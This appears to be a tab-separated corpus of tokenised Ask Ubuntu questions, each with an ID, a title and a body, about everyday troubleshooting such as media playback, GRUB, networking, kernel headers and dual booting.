317312	vlc wo n't play music	i am currently running ubuntu 13.04 . i have used vlc fine for years , but it suddenly stopped working . i believe it was working when i updated to 13.04 . a little bit ago , i enabled raring-proposed , and i 'm not sure if that was the cause of the issue or not ( i usually listen to music on pandora , so i did n't notice exactly when the issue started ) . mp3s do n't work . ogg music files do n't work . however , both of those work in rhythmbox . also , watching mkv video files works in vlc . any ideas ? thanks !
317314	is there a tool to convert the pdf files to chm ?	i was looking for any package or tool to convert the pdf files to chm . anybody did ever use such tool ? i am on ubuntu 13.04
317319	ubuntu , install from usb without the iso ?	so , this is probably a quickie . i 've gotten a copy of ubuntu 11.10 on a memory stick . the contents of the folder is similar to what i found in the .iso of ubuntu 12.04 . my question to you now , is as follows : i do n't actually have the .iso-file , but i have all the contents .. can i still use it to install ? _ edit : i am indeed aware that this is an outdated version . the reason i can not install a newer version , however , is because i am working offshore , and i have a 128/256 kbps internet connection here ( varies between the two ) . this connection is shared among the entire crew and computerized functions onboard , meaning an ubuntu download would take days upon days , not to mention it would render the connection useless to anyone else . i simply have to use whatever i can get my hands on from other members of the crew .
317320	how to make hp wireless headset h8000 work in ubuntu 12.04	i am manoj , i am using ubuntu 12.04 . i am not able to connect my hp headset to ubuntu . please provide a solution for this
317321	how to prevent video lag while watching video ( on vlc and totem ) ?	thanks if you 're reading this . first of all , i got to say that i have ubuntu 12.10 ( i had 12.04 before , and it was playing videos great , but then i upgraded it ) . ok , so , i 'm watching some video and then it just stops moving but the audio keeps up . the video keeps running when i move the mouse . i tried playing a video on a ubuntu 13.04 livecd , but i ca n't install anything and the default video player needs codecs to play .flv videos .
317323	ubuntu on toshiba satellite pro l50 ( i7-3630qm )	i 'm considering the toshiba satellite pro l50 ( pskg9a-009001 -- i7-3630qm ) for a ubuntu install and am wondering if anyone is aware of any issues ( and solutions to same ) with running ubuntu on this machine . i hear that toshibas are a bit more hard work to get up and running with linux . any comments or suggestions would be appreciated . regards richard
317331	program unable to find libgl.so.1	this involves the game hotline miami which i bought from the humble bundle 8 a while ago . after installing it and clicking the executable nothing happened so i ran it from the terminal and got this error : /opt/hotline-miami/hotline_launcher : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory but i do appear to have libgl.so.1 installed according to the locate command which gives me this : /usr/lib/i386-linux-gnu/mesa/libgl.so.1 /usr/lib/i386-linux-gnu/mesa/libgl.so.1.2.0 /usr/lib/i386-linux-gnu/primus/libgl.so.1 /usr/lib/nvidia-current-updates/libgl.so.1 /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1.2.0 /usr/lib/x86_64-linux-gnu/primus/libgl.so.1 /usr/lib32/nvidia-current-updates/libgl.so.1 any idea on what is causing this problem ? i was n't able to find any solution online . computer is an acer 4830tg running ubuntu 12.04 ( this game worked on 12.10 perfectly fine before i had decided to switch to 12.04 )
317336	ubuntu software manager does not function properly	my ubuntu software manager does nort function properly after i install update from the update manager ? why is that so ? is there any way to restore to default setting maybe ? can i reset the system ?
317338	how can i increase disk size on a vagrant vm ?	i have a vm managed by vagrant using virtualbox on a ubuntu host server . my vagrant box uses the puppetlabs debian 6.0.7 basebox , which uses lvm for its root partition . by default the disk is 8gb which is too small for my purposes . i would like to : increase the size of the existing disk and the file system on it without destroying and recreating my vm . configure vagrant so that in future it will create a larger disk for this project . can anyone explain how to do this ?
317342	what happens when kernel update completely fills my boot partition ?	i partitioned a 1 gb boot partition when i installed 12.04 . every update that installs a new kernel adds to the content of the boot partition . soon it will be filled . does ubuntu overwrite or purge old unused files in the boot partition automatically ?
317347	strange error when logging into xubuntu 12.04	every time i log in , for some reason , i get a little box that pops up in the middle of my screen that says : invalid option : -session it just started yesterday and i 'm not sure what is causing it . i 'm running the 64bit version of xubuntu 12.04 64-bit .
317349	unity freezing after changes icons sets !	os : ubuntu 13.04 desktop environment : unity process : intel® core™2 quad cpu q9550 @ 2.83ghz × 4 ram : 4gb video card : ati 1gb i use `` unity tweak tool '' to change icons , and when i change icons to `` faenza '' , and try to search in unity i see some icons disappeared and the all unity freezing except mouse still i can move it . and i try to use another `` flattr '' sets but same problem http : //deviantn7k1.deviantart.com/art/flattr-icon-theme-376383397 and then try to play with `` inherits '' in `` index.theme '' for `` faenza '' to depends on ubuntu mono icons but same problem and even re-install ubuntu 13.04 but problem still and when try to change to `` nitrux '' all icons appear and no freezing , and also ubuntu icons work well . may be the problem after update the system , or bug
317352	the grub can be scheduled ? this means : changing default 'entry ' ( auto login ) at defined periods of time automatically ?	for example : 00:00:00 to 06:00:00 - > slitaz 06:00:01 to 13:00:00 - > ubuntu 13:00:01 to 19:00:00 - > fedora 19:00:01 to 23:59:59 - > opensuse can grub change default 'entry ' automatically ?
317356	how to install backtrack along ubuntu ?	during my ubuntu installation i have let ubuntu to use all the hard-disk . but now i want to install backtrack alongside my ubuntu . how do i proceed ?
317357	install google chrome on 11.10	i 'm trying to install google chrome in my ubuntu 11.10 os however i 'm getting this error : $ sudo dpkg -i google-chrome-stable_current_amd64.deb [ sudo ] password for xybrek : selecting previously deselected package google-chrome-stable . ( reading database ... 167351 files and directories currently installed . ) unpacking google-chrome-stable ( from google-chrome-stable_current_amd64.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on gconf-service ; however : package gconf-service is not installed . google-chrome-stable depends on libgconf-2-4 ( > = 2.31.1 ) ; however : package libgconf-2-4 is not installed . google-chrome-stable depends on libx11-6 ( > = 2:1.4.99.1 ) ; however : version of libx11-6 on system is 2:1.4.4-2ubuntu1 . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for gnome-menus ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable
317361	wired connection fails	i have been using ubuntu for a few years now , and since i upgraded from 12.10 to 13.04 i have this issue , where i get no error or notifications at all , but my wired connection just stops working . the connection stops working when i open a webbrowser , use terminal to update or whatever i am doing . the only thing that does n't let the connection being dropped seems to be dropbox and skype . i noticed some changes in my /etc/resolv.conf file . which contains this line when the connection is still working : nameserver 127.0.0.1 and contains this line after it stops working : search lan changing anything in this file does n't seem to work , neither does sudo service network-manager restart do anything usefull . i collected some data here : lspci -nnk | grep -ia2 eth 02:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) subsystem : acer incorporated [ ali ] device [ 1025:050e ] kernel driver in use : atl1c sudo lshw -c network *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : c0 serial : b8:70 : f4:6d:78 : cc size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi duplex=full ip=192.168.1.30 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:53 memory : c0200000-c023ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : bcm43227 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 00 serial : c0 : f8 : da:54:15:0d width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.1.11 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : c0100000-c0103fff cat /etc/network/interfaces ( # ) interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback the ( ) around the # are only there to not let the site turn it into caps ( the text , it is a markup thingy ) . i also read about this bug : link and was told to quote out dns=dnsmasq in /etc/networkmanager/networkmanager.conf and restart network manager . this all did n't work . does anyone please have an answer ? thanks in advance .
317363	gcc does no come up with new upgraded kernel	after i figuerd out my ubuntu 12.10 amd64 with 3.5.x kernel does not fill some queuing , and they 've fixed that in kernel 3.8.x , i upgraded the kernel of my ubuntu to v3.10-saucy with installing deb files from the mainline kernel archive and things went well . uname -r 3.10.0-031000-generic and the sudo apt-get install linux-image-3.10.0-031000-generic says me things already installed . but after i come to compile my c code with gcc , it still claims that the piece of code that suppose to work on > 3.8.x , is undeclared ! the problem is the new installed kernel header is in /usr/src/linux-headers-3.10.0-031000-generic/include/ but /usr/include still holds the old headers . gcc still reads from /usr/include for header files . then , i came with this : gcc -- verbose -i /usr/src/linux-headers-3.10.0-031000-generic/include/ -o test.out test.c in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:14:26 : error : conflicting types for ‘fd_set’ in file included from /usr/include/x86_64-linux-gnu/sys/types.h:220:0 , from /usr/include/net/if.h:26 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/select.h:76:5 : note : previous declaration of ‘fd_set’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:15:25 : error : conflicting types for ‘dev_t’ in file included from /usr/include/net/if.h:26:0 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/types.h:61:17 : note : previous declaration of ‘dev_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:19:17 : error : conflicting types for ‘nlink_t’ in file included from /usr/include/net/if.h:26:0 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/types.h:76:19 : note : previous declaration of ‘nlink_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:25:26 : error : conflicting types for ‘timer_t’ in file included from /usr/include/x86_64-linux-gnu/sys/types.h:133:0 , from /usr/include/net/if.h:26 , from test.c:2 : /usr/include/time.h:104:19 : note : previous declaration of ‘timer_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:45:26 : error : conflicting types for ‘loff_t’ in file included from /usr/include/net/if.h:26:0 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/types.h:45:18 : note : previous declaration of ‘loff_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:112:17 : error : conflicting types for ‘u_int64_t’ in file included from /usr/include/net/if.h:26:0 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/types.h:204:1 : note : previous declaration of ‘u_int64_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:113:17 : error : conflicting types for ‘int64_t’ in file included from /usr/include/net/if.h:26:0 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/types.h:198:1 : note : previous declaration of ‘int64_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:134:23 : error : conflicting types for ‘blkcnt_t’ in file included from /usr/include/net/if.h:26:0 , from test.c:2 : /usr/include/x86_64-linux-gnu/sys/types.h:236:20 : note : previous declaration of ‘blkcnt_t’ was here in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/kernel.h:6:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/skbuff.h:17 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_ether.h:23 , from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:20 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from test.c:3 : /usr/src/linux-headers-3.10.0-031000-generic/include/linux/linkage.h:7:25 : fatal error : asm/linkage.h : no such file or directory compilation terminated . then , i did : gcc -nostdinc -i /usr/src/linux-headers-3.10.0-031000-generic/include/ to do n't let gcc to access /usr/include . but it claims again some include files like < net/if.h > not found and by removing that header files , it gives some other not found crap inside the found include files either . if < net/if.h > is related to c library , it could be right , because make the gcc not to read other include folders . but it reports some not found inside < linux/if_tun.h > in file included from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/types.h:5:0 , from /usr/src/linux-headers-3.10.0-031000-generic/include/uapi/linux/if_tun.h:19 , from /usr/src/linux-headers-3.10.0-031000-generic/include/linux/if_tun.h:18 , from penvpn-multithread-udp.c:3 : so how do i suppose to get over this ?
317367	how to change unread emails settings in evolution	is it possible to change the settings of unread email so that it 's displayed in red if the email is unread and black if otherwise ? thanks in advance .
317370	how to work with java programs	till date , i 've been working with c programs and i guess all the c libraries are installed already in my system , since i can just gcc program.c and it would compile . but now i am moving onto java , and i guess i 'd need to install the libraries for that . someone please help me with it . i picked up this book 'thinking in java ' and it says that this book focuses on and is tested with java se5/6 . so i guess , i 'd want to download the same version of libraries .
317371	youtube/online videos lag with ff/chromium html5/flash after upgrading to 13.04	running lubuntu 13.04-64 and i ca n't seem to be able to watch hd videos in a browser anymore after upgrading to 13.04 from 12.10 . tried ff and chromium . html5 and flash . i have a dualcore atom processor with a nvidia ion gpu and i can watch 1080p high bitrate 264h with vlc/mplayer without any lag . what can i do ?
317376	updateing package by sudo command in 13.04	i used the sudo command in terminal to update the software after upgrading from 12.10 to 13.04 and it gave me this error : errors were encountered while processing : /var/cache/apt/archives/ubuntu-docs_13.04.3_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas what this means and what is the next step to do . thanks
317377	sound coming out of headphone when running ubuntu , but not window 7	i 've downloaded ubuntu yesterday , and i thought that everything went smoothly , until i found out a problem today . when i am running the ubuntu os on my laptop , the samsung rc420 , the speaker and the headphone works fine . however , when i am running the window 7 os , the speaker works fine , but my headphone will not emit any sound although the laptop has detected that 'a device has been plugged into the audio jack ' . the same problem persist when i connect my x-minis as well . i tried updating my sound card drivers , check if they are hidden/disabled/disconnected and everything else . nothing works : (
317378	list of default packages for ubuntu 12.10 ?	i wanted to remove everything related to wine and i ran this line : sudo apt-get remove wine* for some reason , it started to remove a whole bunch of essential graphical ( or even not ) packages , which i then stopped from being removed when it was already half way through . now , i reinstalled gnome , but windows have an odd appearance . there is definitely something still missing . is there any list of `` default '' packages for ubuntu 12.10 which i could check and possibly install ?
317386	why is the usb installation stopping just after it starts ?	i 've used the universal usb installer to put ubuntu-12.04.2-desktop-amd64.iso on my usb drive . it correctly boots from the usb , but the installation seems to stop almost right when it starts . it 's the first time i 'm installing a different os than windows , so i do n't exactly know what it doing , but i 'd think the installation is initializing . it stops on : ( last two lines ) 0.003749 ] mce : cpu supports 7 mce banks 0.004985 acpi : core revision 20120320 my configuration is : ram : 8gb processor : amd a10-5800k black edition motherboard : msi fm2-a75ia-e53 ssd 128gb hdd 2tb
317387	where to locate a tgz file and contents of it ?	i downloaded processing-2.0.1-linux64.tgz . in windows , when i download a non-install software ( .exe ) i locate it under program files directory so that it stays with other software . i do n't want it to run in downloads or somewhere else . i 'm vety miticulous about my directory structure . so in ubuntu i want processing software to run just like firefox . i mean when i write 'proc ' , it should show up in gnome activities window . i do n't know where to locate a tgz file and contents of it ? there is `` add downloaded package '' in synaptic file menu . i tried it however the tgz file was disabled , not clickable . this is contents of processing-2.0.1 folder .
317392	how to add a custom program to `` open with '' list of programs in xubuntu 13.04 ? how to associate a file with a program to open it with ?	how to associate file types with sublime text 2 ? have downloaded sublime text 2 . i 've unpacked it in /opt/sublime text 2/ directory . now i want to open all .conf files with st2 . but i ca n't set this easily . xubuntu does n't offer st2 in the list of open with programs . i do : right-click on the fonts.conf > > properties ... > > open with > > other application . and an open with window appears . and it does n't have st2 application . how either to add st2 to the open with list or how to associate a file with st2 ? upd : similar questions and are not answered : associate program to a file where program is not in list how to associate file types with sublime text 2 ? why are simple things getting hard in ubuntu ( xubuntu ) ?
317393	is it possible to install cain and abel in ubuntu ?	i just want to know if it 's possible to get cain and abel installed in ubuntu , it would really help my work instead of dual booting back to my windows 7 just to use it . thanks !
317401	max retention of old releases	i currently had a problem where my inodes hit 100 % . this was a real pain to get resolved because everything i tried to do failed because it could n't create a tmp file . in the end , i found that when update manager upgrades the linux kernel , it leaves a the old /usr/src/linux header directories out there . each of these has over 1k files in them . i had headers from 3.2.0.12 up to 49 . basically , this combined with php doc had used up all my inodes . is there a way to have the update manager keep say only the last 4 or 5 versions and automatically delete anything older than that ? thanks , dan
317403	windows 8 failing to install on virtualbox in ubuntu 12.10	i 'm getting the errors attached as screenshots above when i try to start the virtual machine so that it installs windows 8 . when the first error popped out , i clicked on continue and it brought the windows 8 logo for 3 minutes then it showed the black screen with the second error . i have also tried it with physical address extension disabled and it brings the windows 8 recovery error . the host machine is a 4gb ram intel core 2 duo cpu t6570 @ 2.10ghz ă 2 and the virtual machine has 1gb with 1 cpu . how do i get this virtual win8 machine to work ?
317409	do i need networkmanager on ubuntu server ?	i 've seen several posts suggesting using nmcli , nm-tool and similarly named utilities for network related tasks . in my case , i was trying to see what dns my ubuntu server installation is trying to use since my dns lookup started failing after switching to static ip . here are some of the posts that mention these tools : what is my dns server ? command-line to list dns servers ( answer 152610 ) command-line to list dns servers ( answer 152611 ) all of these assume that the nm tools are available on all systems , yet they 're not on mine . apparently they are part of networkmanager . i have n't found network management on my server particularly difficult out of the box , but perhaps i 'm missing something . should i install networkmanager ? here 's my ubuntu server version information : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal
317410	windows 7 + ubuntu on zenbook ux32vd	i bought a zenbook ux32vd the other day , and i upgraded it with a 256gb ssd and 8gb ram . i installed windows 7 on the ssd , and partitioned it so there was 40gb for ubuntu and the rest for windows . then i formatted the issd that is soldered on there so i could use that as a space for shared files . i installed ubuntu 13.04 on the 40gb partition with a live usb , but i can not boot into ubuntu . the regular screen with options on it does n't show up ; it just boots straight into windows . i 've read lots of posts on the problem with ubuntu on a zenbook , but none where they have my problems . below is a picture of the partition manager that shows that ubuntu is installed . has anyone experienced this before ?
317411	downgrade from 13.10 to 13.04	how do i downgrade from the 13.10 developer build to the 13.04 stable release ?
317413	where does ubuntu software center install mscorefonts on xubuntu ? where does it install anything ?	i have installed mscorefonts from ubuntu software center . but i ca n't find them neither : in /etc/fonts/ nor in /usr/local/ nor in /usr/local/share/fonts/ . also i ca n't find any info about installed fonts in the installed of ubuntu software center . no any changes were made in /etc/fonts/fonts.conf . where does ubuntu software center install fonts ? why they are not present in installed of ubuntu software center ? how may i find out where does ubuntu software center install something on my computer ?
317416	ubuntu does n't detect android hotspot	i 'm trying to connect to my android from ubuntu 13.04 pc . but my wireless manager in ubuntu ca n't detect my android wireless network . i tried on windows and it works , what could be the problem ? also : usb tethering works in ubuntu just the wireless does n't . additional info : 1 - my friends ubuntu ( same as mine ) detects my phone . 2 - my ubuntu detects my friends android hotspot . it looks like the problem is my ubuntu . does anyone have any idea ?
317417	how to recover partitions of a hardisk that is formatted at the time of installing ubuntu 13.04 ?	i am using ubuntu 13.04 on my hp-probook core i-3 laptop from 7 days earlier . there was 6 partitions . one for ubuntu 13.04 ( ex-4 ) , others are in ntfs . today suddenly it hang-upped . after restarting it showed that , there is no os . so am trying to reinstall ubuntu 13.04 by a bootable pendrive . at first i select a option to try ubuntu without installing . then from desktop to install ubuntu 13.04 it said : '' the installer has detected that the following disks have mounted partitions do you want the installer to try to unmount the partitions on these disks before continuing ? if you leave them mounted , you will not be able to create , delete , or resize partitions on these disks , but you may be able to install to existing partitions there '' i click to yes . and it continued . then i select a option that was : '' erase ubuntu 13.04 and reinstall warning : this will delete all your ubuntu 13.04 programs , documents , photos , musics and any other files '' i thought it will delete only the drive where was ubuntu system file . and click to install . after few secods it wants to write user details . so i did n't missed this step also . after filled up and continued to the next and its working . in that time i felt that its not wanted to select drive , so it was again taken mistake which was held in 2 years ego with ubuntu 10.10 , where my harddisk fully formatted and i lost all data . instantly i eject the pendrive and restart the laptop . again try ubuntu without installing but i found that 500 gb harddisk are in 498 gb file system with no partition and some installation files were copied there.now i totally turn off the laptop there was very iumportant data of my 4 year study related . but i don’t want to loss those . now what can i do…………. ? ? ?
317418	how can i make my custom key shortcut	i would like to know how i can make my custom key shortcut to run an executable file located on my desktop , and i would like to use the key command of ctrl+f to activate it . thanks !
317423	microsoft office	my online school provides microsoft office applications that we can download to our computer . i absolutely need them for my assignments . is there a way i can download these applications on ubuntu ?
317427	ubuntu mouse bug	i think i am getting crazy ! i have a normal ubuntu 13.04 ubuntu on a laptop after some days after installing , the mouse is getting buggy . some windows cant recognize my mouse actions ( scrolling , left/right click ) . but windows behind the window i want to control react to my clicks . after reinstalling the whole os the same thing happened again . command xev ( x11-utils ) shows my intputs ( on keyboard and mouse ) . keycombinations like windows+tab still work ( i had to switch to firefox to write my question here ! ) . does somebody know this behavior ? is there a way to fix this ? how can mouseclicks go to a wrong window ? it is really hard to write a question here without a mouse !
317429	repairing grub - separate partition - dual boot windows	i am attempting to repair grub on separate /boot partition without removing windows boot loader . i installed ubuntu 12.04 after windows 8 on 250gb ssd drive . grub installation failed during ubuntu install on separate /boot partition ( i chose to skip grub install after this happened ) however , grub does seem to be installed on that separate /boot partition . however , grub command line is loaded when i boot to it . i do n't think there are any os entries . i created a entry in windows boot loader directly to ubuntu os partition , but it does same thing : grub command line . i am following instructions here with live usb : https : //help.ubuntu.com/community/grub2/installing # fixing_a_broken_system i 'm worried that this command will overwrite mbr and windows boot loader : sudo grub-install /dev/sda i tried this , but it tells me that installing grub to a partition is not recommended : sudo grub-install /dev/sda3 do i even need to do an install ? do i just need to update config with os entries ? i 've seen chroot mentioned . here is my fdisk -ls : device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 439648255 219464704 7 hpfs/ntfs/exfat /dev/sda3 439648256 440135679 243712 83 linux /dev/sda4 440137726 488396799 24129537 5 extended /dev/sda5 440137728 480583679 20222976 83 linux /dev/sda6 480585728 488396799 3905536 82 linux swap / solaris any help is much appreciated !
317432	is there a gui for visudo ?	how can i use a gui to edit my sudoers file ? i want to add the nopasswd option without having to learn any vi shortcuts .
317442	how to invert ctrl and cmd on a macbook pro keyboard ?	using mac computers for few years , i got accustomed of using the cmd key on the keyboard as a standard ctrl key . with ubuntu 13.04 on my macbook pro 5,3 ( 2009 ) , the cmd is used for unity controls , and ctrl for applications shortcuts . is there any way to switch the two keys ? so that , as an example , close a tab in firefox would be cmd+w instead of ctrl+w ?
317445	i cant make my 8gb flash drive bootable ?	i ca n't boot from a usb i always end up in windowsxp start screen i do n't know what 's the problem am using windows xp sp2 ( dont know if that 's the problem )
317448	keyboard shortcuts are not working with numlock key on	i 'm experiencing problems with ctrl+alt+any letter shortcuts . for example the `` lock screen '' shortcut wich is ctrl+alt+l works only when i press the keys in alt+ctrl+l order . it does n't work when the ctrl button was pressed first . a workaround for the issue it to turn off the numlock , but it does n't seem to me a good solution because i use the keypad very often . the shortcuts have been working fine a day ago . i changed one of them in the settings , but i did n't change anything else . is there any solution for the problem , or a way to restore back default keyboard shortcuts ? i want the keyboard shortcuts work no matter what order the keys has been pressed .
317449	can i get some help with making live usbs ?	i run 13.04 on this laptop and 12.04 on my netbook . i am trying to dual boot with 13.04 and another distro , but all my live usbs wo n't work . i have tried sudo dd if [ ur.iso ] of=/dev/sd ( x ) , which is n't booting to the live usb but to my ubuntu installation . i have tried unetbootin which gives me a black screens or `` this is not a bootable device '' . i also have tried to do it on my netbook and re-downloading the .iso file . i have now also tried the live disk creator and i get up to the selecting install but it reads `` can not mount '' in ubuntu 13.04 . i really want to do this and i am desperate for answers . is there anything i can do ?
317451	how to install the same host operating system in virtualbox ?	i am using ubuntu-13.04 and want to install this same os in oracle-virtual box . i do n't have the iso image and do n't want do download the big image file . is there any way to directly install it on vbox ?
317464	can i safely remove lubuntu-desktop ?	i 'm running lubuntu 13.04 on my asus netbook . i want to get rid of abiword ( because i think it corrupted an odt file ) . however , when i select it for complete removal in synaptic package manager ( spm ) i 'm informed that lubuntu-desktop will also be removed . my rough googling informs me that this is the desktop environment suggesting that getting rid of it could have dire consequences . i 'm a bit confused . why should abiword be tightly bound to lubuntu-desktop ? more importantly , what will be the effect of getting rid of lubuntu-desktop ? could this be an error on spm 's part ? paulkorir @ paulkorir-x101ch : ~ $ sudo apt-get remove abiword abiword-common reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : conglomerate-common libbonoboui2-0 libbonoboui2-common libgnomeui-0 libgnomeui-common use 'apt-get autoremove ' to remove them . the following packages will be removed : abiword abiword-common lubuntu-desktop 0 upgraded , 0 newly installed , 3 to remove and 17 not upgraded . after this operation , 15.4 mb disk space will be freed . do you want to continue [ y/n ] ?
317469	learning the basics of ubuntu networking	i am reading the book `` ubuntu-unleashed '' and there is many topics on server , host , dhcp , apache and i do n't know those topics well . where do i start to have the basic knowledge of networking in ubuntu and the basic knowledge about apache , mysql etc servers ( if i have interpreted the client/server/host meanings correctly ) ? and by the way , my ultimate goal is learning penetration testing . but i have realized that without knowing this basic networking stuffs i ca n't do much . i have set up a virtual network in vbox with two ubuntu os . so my question is how do i proceed in learning networking , i just need a guideline ? ps . should i install ubuntu server in one vm and normal in the other ?
317471	black screen after log-in on 13.04 ! i dont see an answer to me problem !	i installed ubuntu 13.04 on on my windows xp pc . i used a flash drive to install and wipe out windows xp . after the installation completes i am able to log in but the screen is black/ i do n't know anything about how to even get to the terminal so please write simple directions .
317472	how to setup ssh server on ubuntu 12.04	i installed openssh-server openssh-client ssh packages in my pc . i setup an account on noip.com to access my pc from anywhere . and it 's working . i started the ssh server on my pc . and then i entered this command on my laptop : ssh omerjerk @ *****.no-ip.org ( actual domain hidden ) . but on my laptop i 'm getting connection time out error . i 'm able to connect to the pc within the same lan using the local ip .
317473	acpi and macbook pro 5,3 ubuntu 13.04	found out that i ca n't use acpi on my macbook pro 5,3 ( 2009 ) with ubuntu 13.04 . i tested it with the 3.6.x and 3.8.x kernels , and with nvidia drivers 310 ( `` tested '' driver in `` additional driver '' ) and 313 ( also available in `` additional drivers '' ) . if i boot with acpi=off , the system runs good , but i ca n't go in suspend mode , the screen stays alive when i close the screen , and when i shut down the computer the process stops after the `` system halt '' message ( and i 'm forced to long-press the power button to shut it down once and for all ) . if i boot with acpi on ( that is , i delete the `` acpi=off '' in grub2 ) , i can manage the battery , i see it in parametres > energy , but the system suddenly freezes after a minute of two , whatever i 'm doing at the moment . i 'm forced to long press the power button to reboot the system ... any idea how to fix it ?
317475	all my files disappeared . how can i retrieve my files ?	recently i accessed my account to get some files but everything disappeared . all the folder structure remained as before , but everything was empty ! i used ubuntu one to keep these files safe but instead i 've lost everything ! i do n't need to retrieve everything , i just need one folder .
317476	how do i configure graphics ?	please bear with me as i am a noob to linux . i recently installed ubuntu into a virtual machine that i made with oracle 's virtualbox , assigning the recommended ram and storage . i chose to have the installation download updates and third party add-ons . rather than choose the reboot option at the completion of installation , i clicked x on the prompt box and powered down from virtualbox so that it would not just reboot from the installation iso for ubuntu . when i attempt to run ubuntu in virtualbox , it begins to boot , but then i get a black screen with the following message : '' the system is running in low-graphics mode . your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . '' i seem to have no problem with my input device , as the keyboard and mouse are both functioning fine . however , my experience level with this kind of thing is limited to being able to follow clearly laid out instructions as to how to proceed . included below are the details on my computer : hp dv7 entertainment notebook 4g ram windows 7 home premium 6.1.7601 service pack 1 build 7601 intel core 2 duo cpu t6400 @ 2.00ghz nvidia geforce 9600m gt with driver version 311.00
317477	ubuntu 13.04 on windows 8 with dual boot	i want to install ubuntu 13.04 on windows 8 with dual boot . what is recommended swap size in terms of total size given to ubuntu ( i want to give 500 g for ubuntu ) ? is 10 - 20 % of total ubuntu partition sufficient ?
317478	wifi does n't work after suspend	i have hp pavilion dv7 6163-us and every time i put the computer to suspense or close the lid , then start it again , the wifi does n't work . i have to restart the computer every time . is there any sudo code that would fix this issue ? any help is greatly appreciated . thank you : )
